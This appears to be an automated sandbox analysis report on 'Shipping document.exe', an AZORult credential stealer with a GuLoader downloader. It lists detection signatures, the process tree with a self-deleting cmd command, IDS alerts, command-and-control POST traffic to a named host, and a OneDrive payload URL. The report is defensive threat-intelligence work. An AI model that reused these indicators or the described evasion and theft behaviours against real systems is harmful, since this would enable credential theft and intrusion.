Loading ...

Play interactive tourEdit tour

Analysis Report Shipping document.exe

Overview

General Information

Sample Name:Shipping document.exe
Analysis ID:318114
MD5:a762367c8bb3a6767623554812ef4f45
SHA1:a9640f69a56a674cfd2f889d0c1f978bba632675
SHA256:036f01c20524f75f7ab8a3f30fdb336ef4eb050a4071b9e022bb7389114457b1
Tags:AZORultexe

Most interesting Screenshot:

Detection

Azorult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Executable has a suspicious name (potential lure to open the executable)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • Shipping document.exe (PID: 7044 cmdline: 'C:\Users\user\Desktop\Shipping document.exe' MD5: A762367C8BB3A6767623554812EF4F45)
    • Shipping document.exe (PID: 7132 cmdline: 'C:\Users\user\Desktop\Shipping document.exe' MD5: A762367C8BB3A6767623554812EF4F45)
      • cmd.exe (PID: 6604 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6428 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.421788757.000000001E050000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000001.00000002.418079486.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          Process Memory Space: Shipping document.exe PID: 7044JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: laninesolution.comVirustotal: Detection: 10%Perma Link
            Source: laninesolution.comVirustotal: Detection: 10%Perma Link
            Source: http://laninesolution.com/roky/PL341//index.phpVirustotal: Detection: 10%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: Shipping document.exeVirustotal: Detection: 50%Perma Link
            Source: Shipping document.exeReversingLabs: Detection: 47%
            Source: Shipping document.exeVirustotal: Detection: 50%Perma Link
            Source: Shipping document.exeReversingLabs: Detection: 47%
            Machine Learning detection for sampleShow sources
            Source: Shipping document.exeJoe Sandbox ML: detected
            Source: Shipping document.exeJoe Sandbox ML: detected

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.6:49729 -> 202.52.146.108:80
            Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 202.52.146.108:80 -> 192.168.2.6:49729
            Source: TrafficSnort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.6:49729 -> 202.52.146.108:80
            Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 202.52.146.108:80 -> 192.168.2.6:49729
            Source: Joe Sandbox ViewASN Name: GMEDIA-AS-IDGlobalMediaTeknologiPTID GMEDIA-AS-IDGlobalMediaTeknologiPTID
            Source: Joe Sandbox ViewASN Name: GMEDIA-AS-IDGlobalMediaTeknologiPTID GMEDIA-AS-IDGlobalMediaTeknologiPTID
            Source: global trafficHTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 113Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 45 14 eb 26 66 98 26 66 98 42 70 9d 34 70 9d 31 70 9c 47 70 9d 37 70 9d 33 70 9d 33 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 6c Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gE&f&fBp4p1pGp7p3p3p10l0b0l
            Source: global trafficHTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 31089Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 113Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 45 14 eb 26 66 98 26 66 98 42 70 9d 34 70 9d 31 70 9c 47 70 9d 37 70 9d 33 70 9d 33 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 6c Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gE&f&fBp4p1pGp7p3p3p10l0b0l
            Source: global trafficHTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 31089Cache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: unknownHTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 113Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 45 14 eb 26 66 98 26 66 98 42 70 9d 34 70 9d 31 70 9c 47 70 9d 37 70 9d 33 70 9d 33 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 6c Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gE&f&fBp4p1pGp7p3p3p10l0b0l
            Source: unknownHTTP traffic detected: POST /roky/PL341//index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 113Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 45 14 eb 26 66 98 26 66 98 42 70 9d 34 70 9d 31 70 9c 47 70 9d 37 70 9d 33 70 9d 33 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 6c Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gE&f&fBp4p1pGp7p3p3p10l0b0l
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: Shipping document.exe, 00000001.00000002.421788757.000000001E050000.00000004.00000001.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341//index.php
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/Fhttps://www.google.com/chrome/=
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php.r
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpZhttps://contextual.media.net/medianet.php
            Source: Shipping document.exe, 00000001.00000002.418079486.0000000000560000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21255&authkey=AOsP8wq
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: Shipping document.exe, 00000001.00000002.421788757.000000001E050000.00000004.00000001.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341//index.php
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/Fhttps://www.google.com/chrome/=
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php.r
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpZhttps://contextual.media.net/medianet.php
            Source: Shipping document.exe, 00000001.00000002.418079486.0000000000560000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21255&authkey=AOsP8wq
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: Shipping document.exe, 00000001.00000002.422631367.000000001EA70000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html

            System Summary:

            barindex
            Executable has a suspicious name (potential lure to open the executable)Show sources
            Source: Shipping document.exeStatic file information: Suspicious name
            Source: Shipping document.exeStatic file information: Suspicious name
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: Shipping document.exe
            Source: initial sampleStatic PE information: Filename: Shipping document.exe
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02211775 NtSetInformationThread,0_2_02211775
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216799 NtProtectVirtualMemory,0_2_02216799
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210480 EnumWindows,NtSetInformationThread,0_2_02210480
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022140ED NtWriteVirtualMemory,0_2_022140ED
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216CCB NtResumeThread,0_2_02216CCB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022110DE NtWriteVirtualMemory,TerminateProcess,0_2_022110DE
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212A25 NtWriteVirtualMemory,0_2_02212A25
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E1C NtResumeThread,0_2_02216E1C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212A7D NtWriteVirtualMemory,0_2_02212A7D
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E45 NtResumeThread,0_2_02216E45
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212E4D NtWriteVirtualMemory,0_2_02212E4D
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02215A86 NtSetInformationThread,0_2_02215A86
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212AE4 NtWriteVirtualMemory,0_2_02212AE4
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02211AE9 NtWriteVirtualMemory,0_2_02211AE9
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022102EF NtWriteVirtualMemory,0_2_022102EF
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216EF1 NtResumeThread,0_2_02216EF1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02215AF2 NtSetInformationThread,0_2_02215AF2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216EC1 NtResumeThread,0_2_02216EC1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216F79 NtResumeThread,0_2_02216F79
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212B40 NtWriteVirtualMemory,0_2_02212B40
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212BAA NtWriteVirtualMemory,0_2_02212BAA
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216F9C NtResumeThread,0_2_02216F9C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212C20 NtWriteVirtualMemory,0_2_02212C20
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02217035 NtResumeThread,0_2_02217035
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216819 NtProtectVirtualMemory,0_2_02216819
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212842 NtWriteVirtualMemory,0_2_02212842
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221585E NtSetInformationThread,0_2_0221585E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022170A2 NtResumeThread,0_2_022170A2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212CA4 NtWriteVirtualMemory,0_2_02212CA4
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216CF9 NtResumeThread,0_2_02216CF9
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212CFE NtWriteVirtualMemory,0_2_02212CFE
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022154CA NtSetInformationThread,0_2_022154CA
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216CD1 NtResumeThread,0_2_02216CD1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216D24 NtResumeThread,0_2_02216D24
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210532 NtSetInformationThread,0_2_02210532
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210538 NtSetInformationThread,0_2_02210538
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221293C NtWriteVirtualMemory,0_2_0221293C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210509 NtSetInformationThread,0_2_02210509
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221710E NtResumeThread,0_2_0221710E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210560 NtSetInformationThread,TerminateProcess,0_2_02210560
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02217168 NtResumeThread,0_2_02217168
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02215D6C NtSetInformationThread,NtWriteVirtualMemory,0_2_02215D6C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216D78 NtResumeThread,0_2_02216D78
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212D7E NtWriteVirtualMemory,0_2_02212D7E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216DA1 NtResumeThread,0_2_02216DA1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022129BC NtWriteVirtualMemory,0_2_022129BC
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221718B NtResumeThread,0_2_0221718B
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221059E NtSetInformationThread,0_2_0221059E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212DF8 NtWriteVirtualMemory,0_2_02212DF8
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216DCD NtResumeThread,0_2_02216DCD
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022105D6 NtSetInformationThread,0_2_022105D6
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02211775 NtSetInformationThread,0_2_02211775
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216799 NtProtectVirtualMemory,0_2_02216799
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210480 EnumWindows,NtSetInformationThread,0_2_02210480
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022140ED NtWriteVirtualMemory,0_2_022140ED
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216CCB NtResumeThread,0_2_02216CCB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022110DE NtWriteVirtualMemory,TerminateProcess,0_2_022110DE
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212A25 NtWriteVirtualMemory,0_2_02212A25
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E1C NtResumeThread,0_2_02216E1C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212A7D NtWriteVirtualMemory,0_2_02212A7D
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E45 NtResumeThread,0_2_02216E45
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212E4D NtWriteVirtualMemory,0_2_02212E4D
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02215A86 NtSetInformationThread,0_2_02215A86
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212AE4 NtWriteVirtualMemory,0_2_02212AE4
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02211AE9 NtWriteVirtualMemory,0_2_02211AE9
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022102EF NtWriteVirtualMemory,0_2_022102EF
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216EF1 NtResumeThread,0_2_02216EF1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02215AF2 NtSetInformationThread,0_2_02215AF2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216EC1 NtResumeThread,0_2_02216EC1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216F79 NtResumeThread,0_2_02216F79
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212B40 NtWriteVirtualMemory,0_2_02212B40
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212BAA NtWriteVirtualMemory,0_2_02212BAA
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216F9C NtResumeThread,0_2_02216F9C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212C20 NtWriteVirtualMemory,0_2_02212C20
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02217035 NtResumeThread,0_2_02217035
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216819 NtProtectVirtualMemory,0_2_02216819
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212842 NtWriteVirtualMemory,0_2_02212842
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221585E NtSetInformationThread,0_2_0221585E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022170A2 NtResumeThread,0_2_022170A2
